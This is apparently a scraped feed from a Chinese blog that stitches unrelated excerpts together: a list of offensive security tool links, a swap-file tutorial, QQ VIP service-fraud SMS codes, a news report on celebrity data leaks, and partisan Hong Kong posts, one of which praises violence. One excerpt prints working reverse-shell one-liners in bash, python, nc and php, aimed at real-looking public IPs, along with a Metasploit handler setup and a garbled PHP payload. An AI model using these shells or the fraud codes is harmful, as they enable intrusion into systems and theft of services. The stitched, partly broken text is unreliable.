-
干货|Python渗透测试工具库
漏洞及渗透练习平台: WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://github.com/RandomStorm/DVWA 数据库注入练习平台 : https://github.com/Audi-1/sqli-labs 用node编写的漏洞练习平台,like OWASP Node Goat: https://github.com/cr0hn/vulnerable-node Ruby编写的一款工具,生成含漏洞的虚拟机: https://github.com/cliffe/secgen 花式扫描器 : Nmap端口扫描器: https://github.com/nmap/nmap 本地网络扫描器: https://github.com/SkyLined/LocalNetworkScanner 子域名扫描器: https://github.com/lijiejie/subDomainsBrute https://github.com/aboul3la/Sublist3r https://github.com/TheRook/subbrute https://github.com/infosec-au/altdns linux漏洞扫描: https://github.com/future-architect/vuls 基于端口扫描以及关联CVE: https://github.com/m0nad/HellRaiser 漏洞路由扫描器: https://github.com/jh00nbr/Routerhunter-2.0 迷你批量信息泄漏扫描脚本: https://github.com/lijiejie/BBScan Waf类型检测工具: https://github.com/EnableSecurity/wafw00f 服务器端口弱口令扫描器: https://github.com/wilson9x1/fenghuangscanner_v3 Fox-scan扫描器: https://github.com/fengxuangit/Fox-scan/ 信息搜集工具 : 社工收集器: https://github.com/n0tr00t/Sreg Github信息搜集: https://github.com/sea-god/gitscan github Repo信息搜集工具: https://github.com/metac0rtex/GitHarvester 信息探测及扫描工具: https://github.com/darryllane/Bluto 内部网络信息扫描器: https://github.com/sowish/LNScan 远程桌面登录扫描器: https://github.com/linuz/Sticky-Keys-Slayer 网络基础设施渗透工具 https://github.com/SECFORCE/sparta SNMAP密码破解: https://github.com/SECFORCE/SNMP-Brute WEB: webshell大合集: https://github.com/tennc/webshell 渗透以及web攻击脚本: https://github.com/brianwrf/hackUtils web渗透小工具大合集: https://github.com/rootphantomer/hacktoolsfor_me XSS数据接收平台: https://github.com/firesunCN/BlueLotus_X55Receiver XSS与CSRF工具: https://github.com/evilcos/xssor xss多功能扫描器: https://github.com/shawarkhanethicalhacker/BruteXSS web漏洞扫描器: https://github.com/andresriancho/w3af WEB漏洞扫描器: https://github.com/sullo/nikto 渗透常用小工具包: https://github.com/leonteale/pentestpackage web目录扫描器: https://github.com/maurosoria/dirsearch web向命令注入检测工具: https://github.com/stasinopoulos/commix 自动化SQL注入检查工具: https://github.com/epinna/tplmap SSL扫描器: https://github.com/rbsec/sslscan 安全工具集合: https://github.com/codejanus/ToolSuite apache日志分析器: https://github.com/mthbernardes/ARTLAS php代码审计工具: https://github.com/pwnsdx/BadCode web指纹识别扫描: https://github.com/urbanadventurer/whatweb 检查网站恶意攻击: https://github.com/ciscocsirt/malspider wordprees漏洞扫描器: https://github.com/wpscanteam/wpscan 固件漏洞扫描器: https://github.com/misterch0c/firminator_backend 数据库注入工具 https://github.com/sqlmapproject/sqlmap Web代理: https://github.com/zt2/sqli-hunter 新版中国菜刀: https://github.com/Chora10/Cknife git泄露利用EXP: https://github.com/lijiejie/GitHack 浏览器攻击框架: https://github.com/beefproject/beef 自动化绕过WAF脚本: https://github.com/khalilbijjou/WAFNinja https://github.com/owtf/wafbypasser 一款开源WAF: https://github.com/SpiderLabs/ModSecurity http命令行客户端: https://github.com/jkbrzt/httpie 浏览器调试利器: https://github.com/firebug/firebug DISCUZ漏洞扫描器: https://github.com/code-scan/dzscan 自动化代码审计工具 https://github.com/wufeifei/cobra 浏览器攻击框架: https://github.com/julienbedard/browsersploit tomcat自动后门部署: https://github.com/mgeeky/tomcatWarDeployer 网络空间指纹扫描器: https://github.com/nanshihui/Scan-T burpsuit之J2EE扫描插件: https://github.com/ilmila/J2EEScan windows域渗透工具: mimikatz明文注入: https://github.com/gentilkiwi/mimikatz Powershell渗透库合集: https://github.com/PowerShellMafia/PowerSploit Powershell tools合集: https://github.com/clymb3r/PowerShell powershell的mimikittenz: https://github.com/putterpanda/mimikittenz 域渗透教程: https://github.com/l3m0n/pentest_study Fuzz: Web向Fuzz工具 https://github.com/xmendez/wfuzz HTTP暴力破解,撞库攻击脚本 https://github.com/lijiejie/htpwdScan 漏洞利用及攻击框架: msf框架: https://github.com/rapid7/metasploit-framework pocsscan攻击框架: https://github.com/erevus-cn/pocscan Pocsuite攻击框架: https://github.com/knownsec/Pocsuite Beebeeto攻击框架: https://github.com/n0tr00t/Beebeeto-framework 漏洞POC&EXP: ExploitDB官方git版本: https://github.com/offensive-security/exploit-database php漏洞代码分析: https://github.com/80vul/phpcodz CVE-2016-2107: https://github.com/FiloSottile/CVE-2016-2107 CVE-2015-7547 POC: https://github.com/fjserna/CVE-2015-7547 JAVA反序列化POC生成工具: https://github.com/frohoff/ysoserial JAVA反序列化EXP: https://github.com/foxglovesec/JavaUnserializeExploits Jenkins CommonCollections EXP: https://github.com/CaledoniaProject/jenkins-cli-exploit CVE-2015-2426 EXP (windows内核提权): https://github.com/vlad902/hacking-team-windows-kernel-lpe use docker to show web attack(php本地文件包含结合phpinfo getshell 以及55Rf结合curl的利用演示): https://github.com/hxer/vulnapp php7缓存覆写漏洞Demo及相关工具: https://github.com/GoSecure/php7-opcache-override XcodeGhost木马样本: https://github.com/XcodeGhostSource/XcodeGhost 中间人攻击及钓鱼 中间人攻击框架: https://github.com/secretsquirrel/the-backdoor-factory https://github.com/secretsquirrel/BDFProxy https://github.com/byt3bl33d3r/MITMf Inject code, jam wifi, and spy on wifi users: https://github.com/DanMcInerney/LANs.py 中间人代理工具: https://github.com/intrepidusgroup/mallory wifi钓鱼: https://github.com/sophron/wifiphisher 密码破解: 密码破解工具: https://github.com/shinnok/johnny 本地存储的各类密码提取利器: https://github.com/AlessandroZ/LaZagne 二进制及代码分析工具: 二进制分析工具 https://github.com/devttys0/binwalk 系统扫描器 https://github.com/quarkslab/binmap rp: https://github.com/0vercl0k/rp Windows Exploit Development工具 https://github.com/lillypad/badger 二进制静态分析工具(python): https://github.com/bdcht/amoco Python Exploit Development Assistance for GDB: https://github.com/longld/peda 对BillGates Linux Botnet系木马活动的监控工具 https://github.com/ValdikSS/billgates-botnet-tracker 木马配置参数提取工具: https://github.com/kevthehermit/RATDecoders Shellphish编写的二进制分析工具(CTF向): https://github.com/angr/angr 针对python的静态代码分析工具: https://github.com/yinwang0/pysonar2 一个自动化的脚本(shell)分析工具,用来给出警告和建议: https://github.com/koalaman/shellcheck 基于AST变换的简易Javascript反混淆辅助工具: https://github.com/ChiChou/etacsufbo EXP编写框架及工具: 二进制EXP编写工具: https://github.com/t00sh/rop-tool CTF Pwn 类题目脚本编写框架: https://github.com/Gallopsled/pwntools an easy-to-use io library for pwning development: https://github.com/zTrix/zio 跨平台注入工具: https://github.com/frida/frida 哈希长度扩展攻击EXP: https://github.com/citronneur/rdpy 隐写: 隐写检测工具 https://github.com/abeluck/stegdetect 各类安全资料: data_hacking合集: https://github.com/ClickSecurity/data_hacking mobile-security-wiki: https://github.com/exploitprotocol/mobile-security-wiki 书籍《reverse-engineering-for-beginners》: https://github.com/veficos/reverse-engineering-for-beginners 一些信息安全标准及设备配置: https://github.com/luyg24/IT_security APT相关笔记: https://github.com/kbandla/APTnotes Kcon资料: https://github.com/knownsec/KCon 《DO NOT FUCK WITH A HACKER》: https://github.com/citypw/DNFWAH 各类安全脑洞图: https://github.com/phith0n/Mind-Map 信息安全流程图: https://github.com/SecWiki/sec-chart/ tree/294d7c1ff1eba297fa892dda08f3c05e90ed1428 各类CTF资源 近年ctf writeup大全: https://github.com/ctfs/write-ups-2016 https://github.com/ctfs/write-ups-2015 https://github.com/ctfs/write-ups-2014 fbctf竞赛平台Demo: https://github.com/facebook/fbctf ctf Resources: https://github.com/ctfs/resources ctf及黑客资源合集: https://github.com/bt3gl/My-Gray-Hacker-Resources ctf和安全工具大合集: https://github.com/zardus/ctf-tools ctf向 python工具包 https://github.com/P1kachu/v0lt 各类编程资源: 大礼包(什么都有): https://github.com/bayandin/awesome-awesomeness bash-handbook: https://github.com/denysdovhan/bash-handbook python资源大全: https://github.com/jobbole/awesome-python-cn git学习资料: https://github.com/xirong/my-git 安卓开源代码解析 https://github.com/android-cn/android-open-project python框架,库,资源大合集: https://github.com/vinta/awesome-python JS 正则表达式库(用于简化构造复杂的JS正则表达式): https://github.com/VerbalExpressions/JSVerbalExpressions Python: python 正则表达式库(用于简化构造复杂的python正则表达式): https://github.com/VerbalExpressions/ python任务管理以及命令执行库: https://github.com/pyinvoke/invoke python exe打包库: https://github.com/pyinstaller/pyinstaller Veil-Evasion免杀项目: https://github.com/Veil-Framework/Veil-Evasion py3 爬虫框架: https://github.com/orf/cyborg 一个提供底层接口数据包编程和网络协议支持的python库: https://github.com/CoreSecurity/impacket python requests 库: https://github.com/kennethreitz/requests python 实用工具合集: https://github.com/mahmoud/boltons python爬虫系统: https://github.com/binux/pyspider 科学上网: 科学上网工具 https://github.com/XX-net/XX-Net 福利: 微信自动抢红包动态库 https://github.com/east520/AutoGetRedEnv 微信抢红包插件(安卓版) https://github.com/geeeeeeeeek/WeChatLuckyMoney hardsed神器: https://github.com/yangyangwithgnu/hardseed 甲方安全工程师生存指南 web索引及日志搜索工具: https://github.com/thomaspatzke/WASE 开源日志采集器: https://github.com/wgliang/logcool 扫描CS结构的web debuger https://github.com/Kozea/wdb 恢复sqlite数据库删除注册信息: https://github.com/aramosf/recoversqlite/ gps欺骗检测工具: https://github.com/zxsecurity/gpsnitch 应急处置响应框架: https://github.com/biggiesmallsAG/nightHawkResponse web安全开发指南: https://github.com/FallibleInc/security-guide-for-developers 各个知名厂商漏洞测试报告模板: https://github.com/juliocesarfort/public-pentesting-reports linux下恶意代码检测包: https://github.com/rfxn/linux-malware-detect 操作系统运行指标可视化框架: https://github.com/facebook/osquery 恶意代码分析系统: https://github.com/cuckoosandbox/cuckoo 定期搜索及存储web应用: https://github.com/Netflix/Scumblr 事件响应框架: https://github.com/google/grr 综合主机监控检测平台: https://github.com/ossec/ossec-hids 分布式实时数字取证系统: https://github.com/mozilla/mig Microsoft & Unix 文件系统及硬盘取证工具: https://github.com/sleuthkit/sleuthkit 蜜罐: SSH蜜罐: https://github.com/desaster/kippo 蜜罐集合资源: https://github.com/paralax/awesome-honeypots kippo进阶版蜜罐: https://github.com/micheloosterhof/cowrie SMTP 蜜罐: https://github.com/awhitehatter/mailoney web应用程序蜜罐: https://github.com/mushorg/glastopf 数据库蜜罐: https://github.com/jordan-wright/elastichoney web蜜罐: https://github.com/atiger77/Dionaea 远控: 用gmail充当C&C服务器的后门 https://github.com/byt3bl33d3r/gcat 开源的远控: https://github.com/UbbeLoL/uRAT c#远控: https://github.com/hussein-aitlahcen/BlackHole ...
-
利用代码百分百QQ封号7天
这个方法只能冻结发送文字的QQ 不能冻结接收信息的QQ 发送成功后 会直接冻结7天QQ账号 并且只能等自动解冻 封号的文本已经打包了,需要的加群下载,切记别用大号做实验 请勿复制这段文字在QQ里发送 会自动冻结7天QQ号码~ —————— 思路自己想,套路深就好了 谁套路深谁赢 —————— 此代码仅娱乐非法,用途与我无关 ...
-
免费撸腾讯钻方法
话不多说,给你思路,自行领悟。 成功的老铁可以来评论一下。...
-
centos7添加虚拟内存[SWAP]
1.查看内存使用 查看在未增加swap之前虚拟内存的使用情况 free -m Shell 复制 2.创建 swap 文件 使用 dd 命令创建一个 swap 文件, 大小为 2G dd if=/dev/zero of=/home/swap bs=1024 count=2048000 Shell 复制 文件越大,创建的时间越厂 3.转换为 swap 格式 将文件格式转换为 swap 格式的 mkswap /home/swap Shell 复制 4.挂载swap分区 再用swapon命令把这个文件分区挂载swap分区 swapon /home/swap Shell 复制 如果报错:swapon: /home/swap: insecure permissions 0644, 0600 suggested. 修改权限: chmod 600 /home/swap 5.再次查看内存使用 注意观察和1中变化。 free -m Shell 复制 6.设置重启依然有效 为防止重启后swap分区变成0,需要修改/etc/fstab文件: 在文件末尾(最后一行)加上 /home/swap swap swap default 0 0 Shell 复制 7.停用虚拟内存 swapoff -v /home/swap Shell 复制 ...
-
两毛钱开SVIP 理论永久 联通卡
两毛钱开SVIP 理论永久 联通卡 超会:kt3#自己的QQ号发送10661700 普会:kt4#自己的QQ号发送10661700 秒开 开完回复0000到10010 无定制业务 不确定下个月是否扣费 上海联通已测试成功1普会+1超会 其它地区自测 操作图下面 ...
-
网站被K了,要怎么解决。
想解决网站被K这个问题的重中之重点就是:找到问题,并进行针对性的解决! 案例: 1、因服务器不稳定,长期登不上导致整站被K这种情况的,我们首先应该把服务器稳定了,不会的话,可以联系空间商售后客服。然后继续正常优化,提交优质内容,等待蜘蛛正常抓取就OK。 2、因群发、群建被K这种的话就是因为网站垃圾内容太多,如果想只是删除网站垃圾内容的话,是不太现实的。所以就快速的方法就是更换域名或者清除网站内容重新做,提交网站等待网站正常抓取。 3、因涉及违法内容被K 首先提交闭站保护,然后清除站内违法信息内容,三天后提交网站,等待蜘蛛正常抓取。 如果连原因都不知道,那你再怎么解决也是牛头不对马嘴,做一些无用功,除非你真的是“天选之子”。 最后给大家分享一个终极杀招,进行被K原因针对性解决后,换十个左右适合自己网站的优质友链,然后就可以观察网站的变化,等待网站恢复了。...
-
2019刷QQ超级会员代码教程
很高兴你能看到这篇教程,今天我教你一个关于刷钻的永久教程 我从2016年开始对刷钻还是挺感兴趣的,就在昨天我想用手机给我的一个QQ小号开个会员,然后我习惯性的又把它退了 一直到今天9号15点20分还没有回收,然后我深度的研究了一下,分享给了我朋友(他们都成功了)所以(好东西大家分享嘛) 需要的工具:手机 手机卡 代码(开通代码) 例:(超级会员) 1.打开手机QQ 2.个人资料 3.打开超级会员开通页面 4.选择手机支付 5.输入手机号码 6.获取验证码 (输入验证码 - 点击开通) 7.打开手机短信 8.0000到10086 - 10000 - 10010(回复一遍 第9步 - 按数字退定业务 - 然后在回复第9步) 9.编辑内容(##%%*到退定页面) 10.恭喜你成功了! 下面我讲一下代码钻 手机的开放时间为一个月,但官方网站上找不到截止日期 你可以去腾讯客服网查一下 1.发送50至10665999个成员 (这称为55个成员) 2.收到订单信息 (这是给55名成员的) 3.发送总部到10661700 (这被称为总部成员) 4.还收到一条短信 (总部成员的订单短信) 5.然后我们会回复两个订单信息 (不发送,保存草稿应该是让你回复是或1具体看看信息的内容) 6.编辑00000至10661 700编辑00000至106659999 (总共有两条短信) 7.用你1 8岁的单手速度发送四条短信。务必先发送订单,然后发送00000 (即取消订单) 8.然后,您将收到两条绑定消息来绑定您的QQ 9.恭喜你又成功了! 运营商:移动 电信 联通(湖南) 移动 电信(浙江) 亲测地址: 湖南长沙-怀化 浙江宁波 这个三个城市亲测成功 其他地区和运营商自己测试-因为我没有各大地区的卡 短信取消法代码: 会员发送VIP到106617009777 红钻发送QQF到106617009777 黄钻发送QQH到106617009777 蓝钻发送QQY到106617009777 绿钻发送AD到106617009777 超级QQ发送HQ到106617009777 点播法代码: 超Q MQ#QQ号码发送到1065889900 黄钻:HZ#QQ号码发送到1065889900 蓝钻:LZ#QQ号码发送到1065889900 绿钻:LZ#QQ号码发送到106580777 图书:YD#QQ号码发送到106580777 绿钻:MU#QQ号发送到106588993655 魔钻:MZ#QQ号码发送到1065889900 会员:HY#QQ号码发送到1065889900 红钻:SH#QQ号码发送到106588993655 超级会员:HYVIP#QQ发送到106588993655 蓝钻豪华版:LZVIP#QQ发送到106588993655 绿钻豪华版:MUVIP#QQ发送到106588993655 黄钻豪华版:HZVIP#QQ发送到106588993655 腾讯好莱坞:FL#QQ发送到106588993655 体育会员:SP#QQ发送到106588993655 ...
-
涪陵榨菜给台湾专家寄榨菜
此 前,台湾“名嘴”黄世聪在节目中声称“大陆人吃不起榨菜”,引发网友群嘲。 近日,乌江涪陵榨菜公司安排寄送一箱榨菜给黄世聪,并告诉他“我们吃得起”! 黄世聪:大陆人连榨菜都吃不起了 日前,在一档名为《关键时刻》节目中,台湾财经“砖家”黄世聪一本正经地称:“由于经济不景气,大陆人连榨菜都吃不起了。” 他还在节目中错把“涪陵”的“涪(fú)”读成了“péi”。 黄世聪在谈话节目《关键时刻》中大谈“榨菜论”。 这番言论在网上引起热议后,黄世聪在社交平台上回应时笑称:“请叫我:榨菜哥或榨菜聪。”他表示欢迎网友寄榨菜给他,并附上了地址。 8月11日,黄世聪上台湾另一档政论节目时,有嘉宾再曝出惊人言论“大陆经济不景气,导致五粮液价格大涨”“酒类产品跟景气是颠倒的。越不景气,酒卖得越好,因为你心情不好,要喝一点酒开心一下”。此番言论一出,迅速登上微博热搜,成为网友茶余饭后的笑料。 涪陵榨菜回应:榨菜已经安排上了! 针对“大陆人吃不起榨菜”的言论,乌江涪陵榨菜在其官方微博贴出一张寄往台北的包裹照片,感谢黄世聪“推荐了中国已有1000年历史的榨菜”“激发中国网友炫fu的聪明才智和热情”,因此安排寄送一箱榨菜至台北,告诉他,“我们吃得起榨菜”。 乌江涪陵榨菜微博截图。 对此,网友调侃:“我怀疑他在空手套榨菜” ...
-
利用NC进行传输文件和吹牛逼
环境说明 centos (公网服务器) kali linux (内网设备) 配置防火墙开启我们的端口,本次我们开启了5555端口 安装 centos系列 yum install nc -y Shell 复制 debian unbunt系列 apt-get install nc Shell 复制 进行交互式聊天 先开启服务器端 nc -l 5555 Shell 复制 然后我们开启客户端 nc 公网ip 5555 Shell 复制 传输文件 服务器端(接收端) nc -l 5555 > recv.txt Shell 复制 发送端 nc 192.168.XXX.XXX 5555 < send.txt Shell 复制 ...
-
乱港幕后黑手现形,外交部驻港公署紧急交涉
针对媒体报道美国驻港总领馆官员接触香港“港独”组织头目事,外交部驻港公署有关负责人8月8日紧急约见美驻港总领馆高级官员,提出严正交涉,表达强烈不满和坚决反对,要求美方就此作出澄清。△ 图片来源 | 香港《大公报》 公署有关负责人强调,中方维护国家主权安全和香港繁荣稳定的意志坚定不移,坚决反对任何国家、组织和个人以任何方式干预香港事务。我们强烈敦促美驻港总领馆人员恪守《维也纳外交关系公约》、《维也纳领事关系公约》等国际法和国际关系基本准则,恪守领事人员身份与职责,立即与各种反中乱港分子划清界限,立即停止向违法暴力分子发出错误信号,立即停止插手香港事务,不要在错误的道路上越走越远。 热评丨谁在充当乱港的幕后黑手?他们终于耐不住寂寞现身了! 谁在充当乱港幕后黑手?来,看看香港局势演变的幕后推手,他们越来越耐不住寂寞,开始公开下“指导棋”。 “港独”组织头目黄之锋、罗冠聪,连同“独青”黄程锋、彭家浩在某酒店会面美国驻港澳总领事馆政治部主管Julie Eadeh,被市民撞见,照片很快在互联网刷屏。随后港媒曝出,Julie Eadeh所谓外交生涯起步于美国国务院的对外心战部门,注重渗透当地社会,派驻中东时曾以人权及民主为由,策划颠覆活动。“港独”分子,向颠覆专家请示什么?颠覆专家又会做出什么指令?我们不难想象。我们也正告他们,香港是中国的香港,香港的稳定是人心所向。中国人民不信邪也不怕邪,不惹事也不怕事。谁来充当幕后黑手,都会铩羽而归,不信走着瞧!...
-
渗透测试中弹shell的多种方式
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。 我们先来讲一下什么是正向连接和反向连接。 正向连接:我们本机去连接目标机器,比如ssh和mstsc 反向连接:目标机器去连接我们本机 那么为什么反向连接会比较常用呢 目标机器处在局域网内,我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境 攻击机:Kali Linux :47.98.229.211 受害机:Centos 7 :149.129.68.117(阿里云服务器) 姿势一 bash bash也是最常见的一种方式 Kali监听 nc -lvvp 4444 Shell 复制 centos运行 bash -i >& /dev/tcp/47.98.229.211/5555 0>&1 Shell 复制 执行命令后,成功得到反弹! 姿势二 python 攻击机Kali还是监听 nc -lvvp 5555 Shell 复制 centos执行 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' Python 复制 姿势三 nc 如果目标机器上有nc并且存在-e参数,那么可以建立一个反向shell 攻击机监听 nc -lvvp 5555 Shell 复制 目标机器执行 nc 47.98.229.211 5555 -t -e /bin/bash Shell 复制 这样会把目标机的/bin/bash反弹给攻击机 但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式 姿势四 php 攻击机监听 nc -lvvp 4444 Shell 复制 要求目标机器有php然后执行 php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");' Shell 复制 其他的一些高能操作 关于PHP的payload 现在msfconsole中进行简单的配置 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 Shell 复制 PHP <? php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) { {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s > PHP 复制 ...
-
记者探访明星信息地下交易:身份证号2元,手机号码30元可买
公民个人信息泄露事件已屡见不鲜,近日,演员王一博称自己的个人信息被泄露,遭到疯狂骚扰,此类话题再次引发关注。 购买明星私人信息除了能够满足粉丝的猎奇心理外,粉丝可以根据这些信息掌握明星的行程,甚至可以订到与偶像邻座的机票,入住偶像所下榻的酒店以达到追星的目的,因此粉丝经济也助推了贩卖明星信息的非法产业链。对此律师表示,这种行为已经涉嫌触犯刑律中有关侵犯公民个人信息罪的内容。 近日,演员王一博发微博称自己电话号码被泄露,遭到粉丝疯狂骚扰,并贴出电话来电记录,引发公众关注。 ▲网上售卖的某明星个人信息。网络截图 实际上,明星艺人信息泄露已经不是第一次。记者调查发现,明星的各种个人信息在微博、微信、闲鱼等渠道被明码标价公开售卖,这些信息价格低廉,从几块钱到100元不等,500元能够打包购买上百位明星的信息。 广东中安律师事务所合伙人潘翔律师表示,粉丝经济助推了贩卖明星信息的非法产业链,“黄牛”违法售卖明星信息涉嫌侵犯公民个人信息罪。 ━━━━━ 艺人遭遇电话轰炸 8月3日晚上10时许,演员王一博发布微博称,因自己手机号被泄露,自己的生活受到了严重影响,呼吁粉丝不要再去打他的电话。 记者从王一博发布的截图中注意到,从8点09分到8点15分,6分钟内有4个电话进来。另一张截图显示,王一博的未接电话有194个。“别再打我电话了,也别再去买我的号码了”。王一博在微博中说。 微博一经发出迅速引发公众注意。截至8月4日晚间,该微博已经被累计评论36万。网友们纷纷留言表示心疼艺人,呼吁抵制干扰艺人正常生活的行为。同时也有不少网友发问,“明星的信息真的能买到吗?” 在微博输入“明星姓名+具体信息”的方式搜索,很容易就寻找到刷屏招揽生意的“黄牛”。 为了规避风险,这些黄牛大多选择微信交易。“微博只是用来引流的”。其中一位“黄牛”说。 资深追星族小颖(化名)告诉记者,明星信息的买卖在粉丝圈内早已是公开的秘密,而且成本并不高,“如果你想对爱豆(偶像)接送机,那就买他的航班号或者身份证号一查就知道。但是一般不会直接给爱豆(偶像)打电话,这种做法太激进了。” 记者调查发现,售卖明星信息的“黄牛”无孔不入,从航班、酒店、通告到音乐游戏账号、手机号、身份证号乃至户籍,明星信息被明码标价出售。这些信息价格低廉,从几块钱到100元不等,500元能够打包购买上百位明星信息。 ▲根据“黄牛”提供的明星信息,记者查询到了该明星预订的航班行程。网络截图 ━━━━━ 明星身份证信息可打包出售 除了微博,在闲鱼上也有不少售卖明星信息的“黄牛”。他们打着“相遇 相思 相见”的噱头,滚动发布着多位明星的航班动态、手机号、微信等信息。 所有的信息均以缩写代指,如sfz(身份证)、hb(航班)、sjh(手机号)、hj(户籍),一位“黄牛”告诉记者这样主要是为了规避风险,防止被平台封号。 记者随机咨询三位“黄牛”后发现,明星的身份证的价格从几元到几十元不等。记者随机询问了多名当红明星的身份证信息,黄牛表示打包售价100元。“500元买到上百位明星的身份证号”。 “买身份证号其实是为了获得航班信息。粉丝可以在机场查询系统直接搜到明星的乘坐的航班、起飞时间等信息,如果明星已经值机,还可以拿到他的座位号。这样你不仅可以送机,还可以买与明星相邻的座位。”小颖说。她曾经用这个办法购买了不少艺人的身份信息,并成功跟自己的偶像“肩并肩”地坐到了一起。 为了进一步核实出售明星信息的真实性,记者先后查询了王源、易烊千玺、王俊凯三位艺人的身份证信息。随后在机场值机平台输入后,果然查到了其中两位有行程安排的航班信息。 一位“黄牛”告诉记者,如果直接购买明星的航班信息每次只需要10元。 除了“黄牛”,在明星信息地下售卖链条中,还有一个名为“敲机子”的特殊群体。“如果你来不及去机场就可以找他们代为查询,然后发给你,每次只需要5块钱。”小颖说。 ▲“黄牛”向记者提供的明星信息。网络截图 ━━━━━ 明星手机号码30元一条 可售卖的明星艺人个人信息“十分丰富”,除了手机号、身份证号之外,明星游戏账号、户籍、入住的酒店也是售卖的热门信息。 记者联系到的另一位“黄牛”称,其所售卖的艺人手机号均绑定了支付宝或者微信,真实可靠,30元一条。黄牛随后提供了一名艺人的电话号码,随后通过支付宝验证属实。 同时,该“黄牛”还售卖有朱一龙、罗云熙、王鹤隶等近10位艺人的手机号码、QQ号等。 微信上一位“黄牛”向记者介绍,除了手机号码,他手里还有部分艺人的游戏账号和户籍信息。随后对方发来了易烊千玺的王者荣耀账号和肖战的绝地求生账号。 在一位卖家的标价中,吴亦凡的户籍信息只需要50元。 对方给记者发来的户籍照片显示,照片右上方为吴亦凡的素颜证件照,这张照片不仅包括吴亦凡的原名、身份证号、籍贯、家庭地址、文化程度,还包括他婚姻状况和兵役状况。 “酒店信息也是大家买得比较多的。”上个月,小颖和朋友通过“黄牛”顺利地购买到了艺人周震南在长沙下榻的某家酒店信息,并提前赶到蹲守,最终在周震南进出酒店期间“偶遇”成功。 “这些黄牛卖的信息基本上都是真的,因为一旦卖过一次假的,就没人再来找你买了。”小颖说。 这些私人信息是哪里来的?一位“黄牛”告诉记者,自己也是从上家那里拿到的,且招收代理,“代理费100元,拿货很便宜”。 ━━━━━ 律师说法 提供明星信息涉嫌侵犯公民个人信息罪 公民个人信息泄露的事件已屡见不鲜,有关部门也对此加以严厉打击。根据新京报此前相关报道,公民个人细信息泄露有的是相关数据管理人员“监守自盗”,有的则是一些网络黑客通过各种“黑客手段”盗取数据。有的黑客或将数据发布在网站上“炫技”,有的则出售贩卖。这些数据来源则是一些个人信息搜集单位,涉及教育、医疗等各个方面。 广东中安律师事务所合伙人、深圳国际仲裁院仲裁员潘翔表示,明星的个人信息往往来源于机票销售代理、酒店等公共服务单位或者此类单位的网络运营平台,粉丝经济也助推了贩卖明星信息的非法产业链。明星艺人的身份信息、电话号码、家庭地址、家庭成员情况、航班出行信息等均属于法律保护的公民个人信息。 潘翔介绍,向他人出售或者提供明星个人信息,情节严重的,涉嫌《刑法》规定的侵犯公民个人信息罪,判处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。 而根据《最高人民法院、最高人民检察院关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》,非法获取、出售或者提供行踪轨迹信息、通信内容、征信信息、财产信息50条以上;非法获取、出售或者提供住宿信息、通信记录、健康生理信息、交易信息等其他可能影响人身、财产安全的公民个人信息500条以上;提供前述信息以外的公民个人信息5000条以上,或违法所得5000元以上等情况,均属于“情节严重”范畴。 ...
-
刚刚!港独份子在台湾遭暴打!
近日,两位“港独”——所谓“香港民族党”召集人陈浩天与所谓发言人周浩辉窜到台湾,本想着拉帮结派求温暖,却在台湾也遇到爱国人士,挨了一顿打,挨了一顿骂,骂他们“卖国贼”,让他们滚。 这段视频看得好过瘾!打得好!骂得好!即使“脸上泛绿”的台湾岛,也有铁骨铮铮的汉子。在一些宵小之辈的撺掇下,台北市市长柯文哲称要“严办”,如果爱国行为都要被“严办”,柯文哲将在历史上留下可耻的一笔记录。 这是另一个“港独”带头闯驻港部队军营招显聪被扇大嘴巴。 看到“港独”被打,我们心里觉得尤其解气。要知道,和这些“港独”讲道理,它们也是骂不醒的,只能“打”醒。当然光靠扇它们大嘴巴也不行,但可这至少是个补充,是个配合。作为一个普通的爱国者,我们能干的,也就这么多了! 无论您有多忙,请花1秒钟时间把它放到你的圈子里!可能您的朋友也需要!谢谢! 免责声明 图文来源于网络整理,本平台对转载、分享的内容、陈述、观点判断保持中立,不对所包含内容的准确性、可靠性或完善性提供任何明示或暗示的保证,仅供读者参考。如涉及版权问题,请联系平台管理员予以更改或删除。 ...
-
互联网上的信息泄漏
